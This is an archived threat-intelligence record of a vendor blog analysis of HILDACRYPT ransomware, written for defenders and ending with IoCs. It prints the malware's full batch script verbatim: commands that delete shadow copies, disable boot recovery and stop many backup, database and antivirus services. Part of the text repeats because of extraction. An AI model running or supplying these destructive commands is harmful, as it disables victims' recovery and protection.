{
	"id": "8fe9e212-72eb-4287-931d-884051d566f0",
	"created_at": "2026-04-06T01:30:36.089464Z",
	"updated_at": "2026-04-10T13:12:45.440223Z",
	"deleted_at": null,
	"sha1_hash": "1393b9225bead7067e826714fd7678e60f47b4aa",
	"title": "HILDACRYPT: A Ransomware Newcomer Hits Backup and Anti-virus Solutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 85271,
	"plain_text": "HILDACRYPT: A Ransomware Newcomer Hits Backup and Anti-virus\r\nSolutions\r\nBy MSPThreatsSecurityTeam\r\nPublished: 2019-10-18 · Archived: 2026-04-06 00:36:11 UTC\r\nHILDACRYPT ransom note\r\nA new ransomware family was discovered in August 2019. Called HILDACRYPT, it is named after the Netflix cartoon\r\n“Hilda” because the TV show’s YouTube trailer was included in the ransom note of the original version of the malware.\r\nHILDACRYPT camouflages itself as a legitimate XAMPP installer, which is an easy to install Apache distribution\r\ncontaining MariaDB, PHP, and Perl. However, the cryptolocker’s file name ‘xamp’ differs from the legitimate version.\r\nMoreover, the ransomware file does not have a digital signature.\r\nStatic analysis\r\nThe ransomware file is PE32 .NET Assembly for MS Windows. It is 135168 bytes in size. Both the payload code and the\r\nprotector’s code are written in C#. According to the compilation timestamp, the binary was compiled on September 14,\r\n2019.\r\nWhile Detect It Easy claims the ransomware was packed with Confuser and ConfuserEx, these obfuscators are the same.\r\nConfuserEx is simply the successor of Confuser, so their code signatures are extremely similar.\r\nDetect It Easy analysis\r\nTo be entirely accurate, however, HILDACRYPT is packed with ConfuserEx.\r\nHILDACRYPT is packed with ConfuserEx\r\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a\r\nAttack vector\r\nMost likely, the ransomware was found on one of the web programming sites pretending to be the legitimate version of\r\nXAMPP software.\r\nThe whole infection chain can be seen at app.any.run sandbox.\r\nObfuscation\r\nThe ransomware’s strings are encrypted when stored. Once launched, HILDACRYPT decodes them with Base64 and\r\nAES-256-CBC.\r\nHILDACRYPT decodes ransomware strings with Base64 and AES-256-CBC\r\nInstallation\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 1 of 6\n\nFirst, the ransomware creates a folder in %AppData\\Roaming% with a randomly generated GUID (Globally Unique\r\nIdentifier). After adding the ‘bat’ file to this location, the ransomware then runs it with cmd.exe:\r\ncmd.exe /c \\ JKfgkgj3hjgfhjka.bat \\ \u0026 exit\r\nHILDACRYPT installation process\r\nIt then starts the batch script to disable system functions or services.\r\nHILDACRYPT disabling system functions and services\r\nThe script contains a long list of commands that deletes shadow copies, disables any SQL server, as well as backup and\r\nanti-malware solutions.\r\nIn addition to attacking popular backup and anti-malware solutions from Veeam, Sophos, Kaspersky, McAfee, and others,\r\nfor example, it also tries (unsuccessfully) to stop the Acronis Cyber Backup services.\r\n@echo off :: Not really a fan of ponies, cartoon girls are better, don't you think? vssadmin resize shadowstorage /for=c:\r\n/on=c: /maxsize=401MB vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded vssadmin resize\r\nshadowstorage /for=d: /on=d: /maxsize=401MB vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded\r\nvssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB vssadmin resize shadowstorage /for=e: /on=e:\r\n/maxsize=unbounded vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB vssadmin resize shadowstorage\r\n/for=f: /on=f: /maxsize=unbounded vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB vssadmin resize\r\nshadowstorage /for=g: /on=g: /maxsize=unbounded vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB\r\nvssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded bcdedit /set {default} recoveryenabled No bcdedit\r\n/set {default} bootstatuspolicy ignoreallfailures vssadmin Delete Shadows /all /quiet net stop SQLAgent$SYSTEM_BGC /y\r\nnet stop “Sophos Device Control Service” /y net stop macmnsvc /y net stop SQLAgent$ECWDB2 /y net stop “Zoolz 2\r\nService” /y net stop McTaskManager /y net stop “Sophos AutoUpdate Service” /y net stop “Sophos System Protection\r\nService” /y net stop EraserSvc11710 /y net stop PDVFSService /y net stop SQLAgent$PROFXENGAGEMENT /y net stop\r\nSAVService /y net stop MSSQLFDLauncher$TPSAMA /y net stop EPSecurityService /y net stop SQLAgent$SOPHOS /y\r\nnet stop “Symantec System Recovery” /y net stop Antivirus /y net stop SstpSvc /y net stop MSOLAP$SQL_2008 /y net stop\r\nTrueKeyServiceHelper /y net stop sacsvr /y net stop VeeamNFSSvc /y net stop FA_Scheduler /y net stop SAVAdminService\r\n/y net stop EPUpdateService /y net stop VeeamTransportSvc /y net stop “Sophos Health Service” /y net stop bedbg /y net\r\nstop MSSQLSERVER /y net stop KAVFS /y net stop Smcinst /y net stop MSSQLServerADHelper100 /y net stop TmCCSF /y\r\nnet stop wbengine /y net stop SQLWriter /y net stop MSSQLFDLauncher$TPS /y net stop SmcService /y net stop\r\nReportServer$TPSAMA /y net stop swi_update /y net stop AcrSch2Svc /y net stop MSSQL$SYSTEM_BGC /y net stop\r\nVeeamBrokerSvc /y net stop MSSQLFDLauncher$PROFXENGAGEMENT /y net stop VeeamDeploymentService /y net\r\nstop SQLAgent$TPS /y net stop DCAgent /y net stop “Sophos Message Router” /y net stop\r\nMSSQLFDLauncher$SBSMONITORING /y net stop wbengine /y net stop MySQL80 /y net stop MSOLAP$SYSTEM_BGC\r\n/y net stop ReportServer$TPS /y net stop MSSQL$ECWDB2 /y net stop SntpService /y net stop SQLSERVERAGENT /y net\r\nstop BackupExecManagementService /y net stop SMTPSvc /y net stop mfefire /y net stop BackupExecRPCService /y net\r\nstop MSSQL$VEEAMSQL2008R2 /y net stop klnagent /y net stop MSExchangeSA /y net stop MSSQLServerADHelper /y\r\nnet stop SQLTELEMETRY /y net stop “Sophos Clean Service” /y net stop swi_update_64 /y net stop “Sophos Web Control\r\nService” /y net stop EhttpSrv /y net stop POP3Svc /y net stop MSOLAP$TPSAMA /y net stop McAfeeEngineService /y net\r\nstop “Veeam Backup Catalog Data Service” / net stop MSSQL$SBSMONITORING /y net stop\r\nReportServer$SYSTEM_BGC /y net stop AcronisAgent /y net stop KAVFSGT /y net stop BackupExecDeviceMediaService\r\n/y net stop MySQL57 /y net stop McAfeeFrameworkMcAfeeFramework /y\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 2 of 6\n\nnet stop TrueKey /y net stop VeeamMountSvc /y net stop MsDtsServer110 /y net stop SQLAgent$BKUPEXEC /y net stop\r\nUI0Detect /y net stop ReportServer /y net stop SQLTELEMETRY$ECWDB2 /y net stop\r\nMSSQLFDLauncher$SYSTEM_BGC /y net stop MSSQL$BKUPEXEC /y net stop SQLAgent$PRACTTICEBGC /y net stop\r\nMSExchangeSRS /y net stop SQLAgent$VEEAMSQL2008R2 /y net stop McShield /y net stop SepMasterService /y net stop\r\n“Sophos MCS Client” /y net stop VeeamCatalogSvc /y net stop SQLAgent$SHAREPOINT /y net stop NetMsmqActivator /y\r\nnet stop kavfsslp /y net stop tmlisten /y net stop ShMonitor /y net stop MsDtsServer /y net stop SQLAgent$SQL_2008 /y net\r\nstop SDRSVC /y net stop IISAdmin /y net stop SQLAgent$PRACTTICEMGT /y net stop BackupExecJobEngine /y net stop\r\nSQLAgent$VEEAMSQL2008R2 /y net stop BackupExecAgentBrowser /y net stop VeeamHvIntegrationSvc /y net stop\r\nmasvc /y net stop W3Svc /y net stop “SQLsafe Backup Service” /y net stop SQLAgent$CXDB /y net stop SQLBrowser /y\r\nnet stop MSSQLFDLauncher$SQL_2008 /y net stop VeeamBackupSvc /y net stop “Sophos Safestore Service” /y net stop\r\nsvcGenericHost /y net stop ntrtscan /y net stop SQLAgent$VEEAMSQL2012 /y net stop MSExchangeMGMT /y net stop\r\nSamSs /y net stop MSExchangeES /y net stop MBAMService /y net stop EsgShKernel /y net stop ESHASRV /y net stop\r\nMSSQL$TPSAMA /y net stop SQLAgent$CITRIX_METAFRAME /y net stop VeeamCloudSvc /y net stop “Sophos File\r\nScanner Service” /y net stop “Sophos Agent” /y net stop MBEndpointAgent /y net stop swi_service /y net stop\r\nMSSQL$PRACTICEMGT /y net stop SQLAgent$TPSAMA /y net stop McAfeeFramework /y net stop “Enterprise Client\r\nService” /y net stop SQLAgent$SBSMONITORING /y net stop MSSQL$VEEAMSQL2012 /y net stop swi_filter /y net stop\r\nSQLSafeOLRService /y net stop BackupExecVSSProvider /y net stop VeeamEnterpriseManagerSvc /y net stop\r\nSQLAgent$SQLEXPRESS /y net stop OracleClientCache80 /y net stop MSSQL$PROFXENGAGEMENT /y net stop\r\nIMAP4Svc /y net stop ARSM /y net stop MSExchangeIS /y net stop AVP /y net stop MSSQLFDLauncher /y net stop\r\nMSExchangeMTA /y net stop TrueKeyScheduler /y net stop MSSQL$SOPHOS /y net stop “SQL Backups” /y net stop\r\nMSSQL$TPS /y net stop mfemms /y net stop MsDtsServer100 /y net stop MSSQL$SHAREPOINT /y net stop WRSVC /y net\r\nstop mfevtp /y net stop msftesql$PROD /y net stop mozyprobackup /y net stop MSSQL$SQL_2008 /y net stop SNAC /y net\r\nstop ReportServer$SQL_2008 /y net stop BackupExecAgentAccelerator /y net stop MSSQL$SQLEXPRESS /y net stop\r\nMSSQL$PRACTTICEBGC /y net stop VeeamRESTSvc /y net stop sophossps /y net stop ekrn /y net stop MMS /y net stop\r\n“Sophos MCS Agent” /y net stop RESvc /y net stop “Acronis VSS Provider” /y net stop MSSQL$VEEAMSQL2008R2 /y\r\nnet stop MSSQLFDLauncher$SHAREPOINT /y net stop “SQLsafe Filter Service” /y net stop MSSQL$PROD /y net stop\r\nSQLAgent$PROD /y net stop MSOLAP$TPS /y net stop VeeamDeploySvc /y net stop MSSQLServerOLAPService /y del\r\n%0\r\nAfter disabling the mentioned above services and processes, the cryptolocker collects information about all running\r\nprocesses using the tasklist command to make sure that all the needed services were disabled.  \r\ntasklist v /fo csv\r\nThis command displays a detailed list of running processes separated with ‘,’. \r\n\"\\\"csrss.exe\\\",\\\"448\\\",\\\"services\\\",\\\"0\\\",\\\"1�896 ��\\\",\\\"unknown\\\",\\\"�/�\\\",\\\"0:00:03\\\",\\\"�/�\\\"\"\r\nHILDACRYPT displaying running processes\r\n After this check, the ransomware starts the encryption process.\r\nEncryption\r\nFile encryption\r\nHILDACRYPT goes through all of the content of found drives, skipping the ‘Recycle.Bin’ and ‘Reference\r\nAssemblies\\\\Microsoft’ folders. (The second folder is skipped because it contains the vital files such as dll, pdb, etc. for\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 3 of 6\n\n.Net applications that may affect the ransomware.)\r\nThe following list of file extensions is used by the ransomware to find the files to be encrypted:\r\n\".vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:\r\n.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:\r\n.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:\r\n.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:\r\n.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:\r\n.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:\r\n.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:\r\n.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:\r\n.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:\r\n.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:\r\n.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:\r\n.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:\r\n.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:\r\n.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:\r\n.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md\"\r\nTo encrypt the user’s files, the ransomware uses AES-256-CBC crypto algorithm. The key size is 256 bits and IV is 16\r\nbytes.\r\nHILDACRYPT encrypts user files with AES-256-CBC\r\nByte_2 and byte_1 were generated randomly on the next screen via GetBytes().\r\nGenerating random byte keys with GetBytes()\r\nEncryption key and IV generation\r\nEncrypted files get an ‘HCY!’ extension. This is an example of an encrypted file. The Key and IV mentioned above were\r\ncreated for this file.\r\nHILDACRYPT applying HCY! extension\r\nKeys encryption\r\nThe cryptolocker stores the generated AES key in the encrypted file. The first part of the encrypted file has a header\r\ncontaining the data such as ‘HILDACRYPT’, ‘KEY’, ‘IV’, ‘FileLen’ in an XML format and looks as follows:\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 4 of 6\n\nHILDACRYPT key encryption\r\nThe AES Key and IV are encrypted with RSA-2048 and encoded with Base64. The RSA public key is stored in one of the\r\nencrypted strings in an XML format in cryptolocker’s body.\r\n\u003cRSAKeyValue\u003e\u003cModulus\u003e28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/\r\ncs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/\r\nJgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/\r\n74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/\r\nUBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==\r\n\u003c/Modulus\u003e\u003cExponent\u003eAQAB\u003c/Exponent\u003e\u003c/RSAKeyValue\u003e\r\nThe RSA public key is used for AES file key encryption. The public RSA key is Base64 encoded and consists of modulus\r\nand public exponent 65537. For decryption, the private RSA key is needed, and that is owned by the attacker.\r\nAfter RSA encryption, the AES key is encoded with Base64 stored in the encrypted file.\r\nRansom notes\r\nWhen encryption is completed, HILDACRYPT drops an ‘html’ file to the folders where it encrypted files. The\r\nransomware note contains two email addresses by which a victim should contact the attacker.\r\nhildalolilovesyou @ airmail . cc\r\nhildalolilovesyou @ memeware . net\r\nHILDACRYPT ransom note\r\nThe ransom note also has the message ‘No loli is safe ;)’ that refers to anime and manga characters that have the physiques\r\nof a prepubescent girl.\r\nConclusion\r\nHILDACRYPT being a new ransomware family, there is an even newer version of it. The encryption model does not\r\nallow victims to decrypt files encrypted by the ransomware. The cryptolocker employs active protection techniques to shut\r\ndown protection services that belong to backup solutions and anti-viruses. The author of HILDACRYPT is clearly a fan of\r\nanime and the “Hilda” TV series on Netflix.\r\nAs usual, the good news is that Acronis Cyber Backup and Acronis True Image can protect your computer against\r\nHILDACRYPT ransomware – and service providers can similarly protect their customers with Acronis Backup Cloud.\r\nThat’s because not only do these cyber protection solutions offer backup, but they also include our integrated Acronis\r\nActive Protection, an AI-enabled and behavior-based technology that is uniquely able to deal with zero-day ransomware\r\nthreats.\r\nIoCs\r\n‘HCY!’ file extension\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 5 of 6\n\nHILDACRYPTReadMe.html\r\n‘xamp.exe’ with one ‘p’ symbol and without a digital signature\r\nSHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a\r\nSource: https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nhttps://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/\r\nPage 6 of 6\n\n https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/      \nnet stop TrueKey /y net stop VeeamMountSvc /y net stop MsDtsServer110 /y net stop SQLAgent$BKUPEXEC /y net stop\nUI0Detect /y net stop ReportServer /y net stop SQLTELEMETRY$ECWDB2  /y net stop  \nMSSQLFDLauncher$SYSTEM_BGC  /y net stop MSSQL$BKUPEXEC  /y net stop SQLAgent$PRACTTICEBGC  /y net stop\nMSExchangeSRS /y net stop SQLAgent$VEEAMSQL2008R2  /y net stop McShield /y net stop SepMasterService /y net stop\n“Sophos MCS Client” /y net stop VeeamCatalogSvc  /y net stop SQLAgent$SHAREPOINT  /y net stop NetMsmqActivator /y\nnet stop kavfsslp /y net stop tmlisten /y net stop ShMonitor /y net stop MsDtsServer /y net stop SQLAgent$SQL_2008 /y net\nstop SDRSVC /y net stop IISAdmin /y net stop SQLAgent$PRACTTICEMGT  /y net stop BackupExecJobEngine /y net stop\nSQLAgent$VEEAMSQL2008R2  /y net stop BackupExecAgentBrowser  /y net stop VeeamHvIntegrationSvc  /y net stop\nmasvc /y net stop W3Svc /y net stop “SQLsafe Backup Service” /y net stop SQLAgent$CXDB /y net stop SQLBrowser /y\nnet stop MSSQLFDLauncher$SQL_2008   /y net stop VeeamBackupSvc /y net stop “Sophos Safestore Service” /y net stop\nsvcGenericHost /y net stop ntrtscan /y net stop SQLAgent$VEEAMSQL2012  /y net stop MSExchangeMGMT /y net stop\nSamSs /y net stop MSExchangeES /y net stop MBAMService /y net stop EsgShKernel /y net stop ESHASRV /y net stop\nMSSQL$TPSAMA /y net stop SQLAgent$CITRIX_METAFRAME  /y net stop VeeamCloudSvc /y net stop “Sophos File\nScanner Service” /y net stop “Sophos Agent” /y net stop MBEndpointAgent /y net stop swi_service /y net stop\nMSSQL$PRACTICEMGT /y net stop SQLAgent$TPSAMA  /y net stop McAfeeFramework /y net stop “Enterprise Client\nService” /y net stop SQLAgent$SBSMONITORING  /y net stop MSSQL$VEEAMSQL2012  /y net stop swi_filter /y net stop\nSQLSafeOLRService /y net stop BackupExecVSSProvider  /y net stop VeeamEnterpriseManagerSvc /y net stop\nSQLAgent$SQLEXPRESS /y net stop OracleClientCache80  /y net stop MSSQL$PROFXENGAGEMENT  /y net stop\nIMAP4Svc /y net stop ARSM /y net stop MSExchangeIS /y net stop AVP /y net stop MSSQLFDLauncher  /y net stop\nMSExchangeMTA /y net stop TrueKeyScheduler /y net stop MSSQL$SOPHOS /y net stop “SQL Backups” /y net stop\nMSSQL$TPS /y net stop mfemms /y net stop MsDtsServer100 /y net stop MSSQL$SHAREPOINT /y net stop WRSVC /y net\nstop mfevtp /y net stop msftesql$PROD  /y net stop mozyprobackup  /y net stop MSSQL$SQL_2008 /y net stop SNAC /y net\nstop ReportServer$SQL_2008  /y net stop BackupExecAgentAccelerator  /y net stop MSSQL$SQLEXPRESS /y net stop\nMSSQL$PRACTTICEBGC  /y net stop VeeamRESTSvc /y net stop sophossps /y net stop ekrn /y net stop MMS /y net stop\n“Sophos MCS Agent” /y net stop RESvc /y net stop “Acronis VSS Provider” /y net stop MSSQL$VEEAMSQL2008R2 /y\nnet stop MSSQLFDLauncher$SHAREPOINT   /y net stop “SQLsafe Filter Service” /y net stop MSSQL$PROD /y net stop\nSQLAgent$PROD /y net stop MSOLAP$TPS /y net stop VeeamDeploySvc /y net stop MSSQLServerOLAPService /y del\n%0       \nAfter disabling the mentioned above services and processes, the cryptolocker collects information about all running\nprocesses using the tasklist command to make sure that all the needed services were disabled. \ntasklist v /fo csv      \nThis command displays a detailed list of running processes separated with ‘,’.  \n\"\\\"csrss.exe\\\",\\\"448\\\",\\\"services\\\",\\\"0\\\",\\\"1�896   ��\\\",\\\"unknown\\\",\\\"�/�\\\",\\\"0:00:03\\\",\\\"�/�\\\"\"    \nHILDACRYPT displaying running processes    \nAfter this check, the ransomware starts the encryption process.   \nEncryption       \nFile encryption       \nHILDACRYPT goes through all of the content of found drives, skipping the ‘Recycle.Bin’ and ‘Reference \nAssemblies\\\\Microsoft’ folders. (The second folder is skipped because it contains the vital files such as dll, pdb, etc. for\n    Page 3 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.acronis.com/en-eu/blog/posts/hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions/"
	],
	"report_names": [
		"hildacrypt-ransomware-newcomer-hits-backup-and-anti-virus-solutions"
	],
	"threat_actors": [],
	"ts_created_at": 1775439036,
	"ts_updated_at": 1775826765,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.pdf",
		"text": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.txt",
		"img": "https://archive.orkl.eu/1393b9225bead7067e826714fd7678e60f47b4aa.jpg"
	}
}